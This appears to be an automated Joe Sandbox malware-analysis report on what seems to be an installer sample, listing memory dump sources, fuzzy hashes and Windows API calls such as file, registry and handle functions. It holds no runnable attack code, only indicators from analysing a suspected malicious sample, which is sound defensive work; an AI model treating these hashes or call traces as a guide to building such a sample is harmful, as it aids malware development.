                                                  • Source File: 00000000.00000002.1676796300.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1676770960.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676818375.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1677056612.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1677056612.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1677056612.0000000000494000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1677056612.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_24100311.jbxd
                                                  Similarity
                                                  • API ID: CloseCreateHandleProcess
                                                  • String ID: Error launching installer
                                                  • API String ID: 3712363035-66219284
                                                  • Opcode ID: ab61a979a714f7ec4effc1a78875f568a822f35fd178278bd28005db307d5d14
                                                  • Instruction ID: 4727b597e06a80ccf73fde1317b74bfd1e446cf8a7cb79422ce9438d985acd26
                                                  • Opcode Fuzzy Hash: ab61a979a714f7ec4effc1a78875f568a822f35fd178278bd28005db307d5d14
                                                  • Instruction Fuzzy Hash: 2FE0B6B4A00209BFEB109B64ED49F7B7BBDEB04648F414465BD50F6190D778A8158A7C
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1676796300.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1676770960.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676818375.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1677056612.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1677056612.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1677056612.0000000000494000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1677056612.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_24100311.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 32b4e55e20c06e4ab42ecec14c412173dc536429d2dc8db053d5bec18c4e9e97
                                                  • Instruction ID: a7b8be33b9a7519416cae36d16977938a601532f9034d24a777c3823dc36e66c
                                                  • Opcode Fuzzy Hash: 32b4e55e20c06e4ab42ecec14c412173dc536429d2dc8db053d5bec18c4e9e97
                                                  • Instruction Fuzzy Hash: F7A14571D04229CBDB28CFA8C854BADBBB1FF44305F14806ED856BB281D7786A86DF45
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1676796300.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1676770960.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676818375.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1677056612.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1677056612.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1677056612.0000000000494000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1677056612.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_24100311.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 5f17471a99a701cf31c58911c016ae07bdee3b17eca89a89cbbe770d5c4f1181
                                                  • Instruction ID: 5a24a20e97f266d7e3441ea32a969c72ce760fd7697c8a443cfa4f07d4855531
                                                  • Opcode Fuzzy Hash: 5f17471a99a701cf31c58911c016ae07bdee3b17eca89a89cbbe770d5c4f1181
                                                  • Instruction Fuzzy Hash: 6F911170D04229CBEF28CF98C854BADBBB1FB44305F14816ED856BB291C7786A86DF45
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1676796300.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1676770960.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676818375.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1677056612.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1677056612.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1677056612.0000000000494000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1677056612.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_24100311.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 1e62c1466b9137082a982da4164a06349666531f21fbb12f17c8ad7a1ced7a97
                                                  • Instruction ID: f684c89e7032feabc3e3bde7c6855c560f6d73b68505d9943badace2bdbe07f8
                                                  • Opcode Fuzzy Hash: 1e62c1466b9137082a982da4164a06349666531f21fbb12f17c8ad7a1ced7a97
                                                  • Instruction Fuzzy Hash: CD814771D04228CFDF24CFA8C944BADBBB1FB44305F25816AD856BB281C7786986DF05
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1676796300.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1676770960.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676818375.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1677056612.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1677056612.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1677056612.0000000000494000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1677056612.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_24100311.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: d02973cee569c5a87d0209c7eb585da92a748f7851f7d1800b7639c908389217
                                                  • Instruction ID: 835433ef786a7bbaa66b5d31b28c9fa354c7a4a33243279710ed11147b04f42a
                                                  • Opcode Fuzzy Hash: d02973cee569c5a87d0209c7eb585da92a748f7851f7d1800b7639c908389217
                                                  • Instruction Fuzzy Hash: F1816871D04228CBDF24CFA8C844BAEBBB0FF44305F11816AD856BB281D7786986DF45
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1676796300.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1676770960.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676818375.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1677056612.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1677056612.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1677056612.0000000000494000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1677056612.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_24100311.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: db5198ca4190c6b334929519d9078d0b7c25f309867be5a342d9eedfd0dff6d3
                                                  • Instruction ID: b4a429368d408adc735ccef7c69d02ca95e21b2dffe456e9be617d596e32585a
                                                  • Opcode Fuzzy Hash: db5198ca4190c6b334929519d9078d0b7c25f309867be5a342d9eedfd0dff6d3
                                                  • Instruction Fuzzy Hash: 44711371D04228CFDF28CFA8C954BADBBB1FB44305F15806AD856BB281D7386986DF45
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1676796300.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1676770960.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676818375.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1677056612.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1677056612.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1677056612.0000000000494000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1677056612.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_24100311.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: afcc572d84cf9765722162092f48605f1f6e2a9c19f2086930970e637c6b8744
                                                  • Instruction ID: ba5f555e51aa8b1381cdd2b0d2a1af6e0fef70f9c7cb40d8a5f6f768353cc961
                                                  • Opcode Fuzzy Hash: afcc572d84cf9765722162092f48605f1f6e2a9c19f2086930970e637c6b8744
                                                  • Instruction Fuzzy Hash: 30713371E04228CFDF28CFA8C854BADBBB1FB44305F15806AD856BB281C7786986DF45
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1676796300.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1676770960.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676818375.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1677056612.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1677056612.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1677056612.0000000000494000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1677056612.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_24100311.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: d487e76e05c5fffd88cdf5b3ac289b2a685634872410f3bf57cf9642bd44b422
                                                  • Instruction ID: ed69e48f2b9f224f5de76fa38221f26f69075a156c73166e2e17eecf637d197c
                                                  • Opcode Fuzzy Hash: d487e76e05c5fffd88cdf5b3ac289b2a685634872410f3bf57cf9642bd44b422
                                                  • Instruction Fuzzy Hash: B1714671E04228CFDF28CF98C854BADBBB1FB44305F15806AD856B7281C7786946DF45
                                                  APIs
                                                  • GetTickCount.KERNEL32 ref: 00403425
                                                    • Part of subcall function 00403590: SetFilePointer.KERNELBASE(00000000,00000000,00000000,0040328E,?), ref: 0040359E
                                                  • SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,0040333B,00000004,00000000,00000000,?,?,004032B5,000000FF,00000000,00000000,0040A230,?), ref: 00403458
                                                  • SetFilePointer.KERNELBASE(00003475,00000000,00000000,00414EF0,00004000,?,00000000,0040333B,00000004,00000000,00000000,?,?,004032B5,000000FF,00000000), ref: 00403553
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1676796300.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1676770960.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676818375.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1677056612.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1677056612.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1677056612.0000000000494000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1677056612.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_24100311.jbxd
                                                  Similarity
                                                  • API ID: FilePointer$CountTick
                                                  • String ID:
                                                  • API String ID: 1092082344-0
                                                  • Opcode ID: 9518b2dd1af65febbd9d180445f0764cbeb29eb017de111e17892d6d002d9159
                                                  • Instruction ID: 897ba5cc79bc3f0d18eddf3670deff7b1eb1d467b83339ddcdcbfe179e357187
                                                  • Opcode Fuzzy Hash: 9518b2dd1af65febbd9d180445f0764cbeb29eb017de111e17892d6d002d9159
                                                  • Instruction Fuzzy Hash: D3317CB2604205EBCB20DF39FE848263BA9B744395755023BE900B32F1C7B99D45DB9D
                                                  APIs
                                                    • Part of subcall function 0040689A: FindFirstFileW.KERNELBASE(74DF3420,00426798,00425F50,00405F62,00425F50,00425F50,00000000,00425F50,00425F50,74DF3420,?,74DF2EE0,00405C6E,?,74DF3420,74DF2EE0), ref: 004068A5
                                                    • Part of subcall function 0040689A: FindClose.KERNEL32(00000000), ref: 004068B1
                                                  • lstrlenW.KERNEL32 ref: 00402337
                                                  • lstrlenW.KERNEL32(00000000), ref: 00402342
                                                  • SHFileOperationW.SHELL32(?,?,?,00000000), ref: 0040236B
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1676796300.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1676770960.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676818375.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1677056612.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1677056612.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1677056612.0000000000494000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1677056612.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_24100311.jbxd
                                                  Similarity
                                                  • API ID: FileFindlstrlen$CloseFirstOperation
                                                  • String ID:
                                                  • API String ID: 1486964399-0
                                                  • Opcode ID: b9677e785c8fed442c1958be79b35b6ef8f35a3833a811a04449e3457438a297
                                                  • Instruction ID: 4d293297d37f642e50e334be784923d4dbf5a3b79a36c56dc06a2ee29788e7cf
                                                  • Opcode Fuzzy Hash: b9677e785c8fed442c1958be79b35b6ef8f35a3833a811a04449e3457438a297
                                                  • Instruction Fuzzy Hash: 31113071910318A6CB10EFB9CE4999EB7B9FF14314F10443FA915FB2D1D6BC89418B69
                                                  APIs
                                                  • RegEnumKeyW.ADVAPI32(00000000,00000000,?,000003FF), ref: 004025C9
                                                  • RegEnumValueW.ADVAPI32(00000000,00000000,?,?), ref: 004025DC
                                                  • RegCloseKey.KERNELBASE(?,?,?,Forkynders\baskets\acylate,00000000,00000011,00000002), ref: 004025F5
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1676796300.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1676770960.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676818375.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1677056612.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1677056612.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1677056612.0000000000494000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1677056612.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_24100311.jbxd
                                                  Similarity
                                                  • API ID: Enum$CloseValue
                                                  • String ID:
                                                  • API String ID: 397863658-0
                                                  • Opcode ID: 663f7e8e5c712848929ff74e32a755a78d6f60c30a625dafa6b1b9bb8ddf2858
                                                  • Instruction ID: 6eea7ab82af3d2392c4b6f989cbcf8a15a9c336fd28670f1f8a7e461480f06f5
                                                  • Opcode Fuzzy Hash: 663f7e8e5c712848929ff74e32a755a78d6f60c30a625dafa6b1b9bb8ddf2858
                                                  • Instruction Fuzzy Hash: 88017C71A11604BBEB149FA49E48AAEB77CEF40348F10403AF901B61C0D7B85E40866D
                                                  APIs
                                                  • CloseHandle.KERNEL32(FFFFFFFF,C:\Users\user\AppData\Local\Temp\,0040394C,00000007,?,00000007,00000009,0000000B), ref: 00403B2B
                                                  • CloseHandle.KERNEL32(FFFFFFFF,C:\Users\user\AppData\Local\Temp\,0040394C,00000007,?,00000007,00000009,0000000B), ref: 00403B3F
                                                  Strings
                                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 00403B1E
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1676796300.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1676770960.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676818375.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1677056612.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1677056612.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1677056612.0000000000494000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1677056612.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_24100311.jbxd
                                                  Similarity
                                                  • API ID: CloseHandle
                                                  • String ID: C:\Users\user\AppData\Local\Temp\
                                                  • API String ID: 2962429428-3081826266
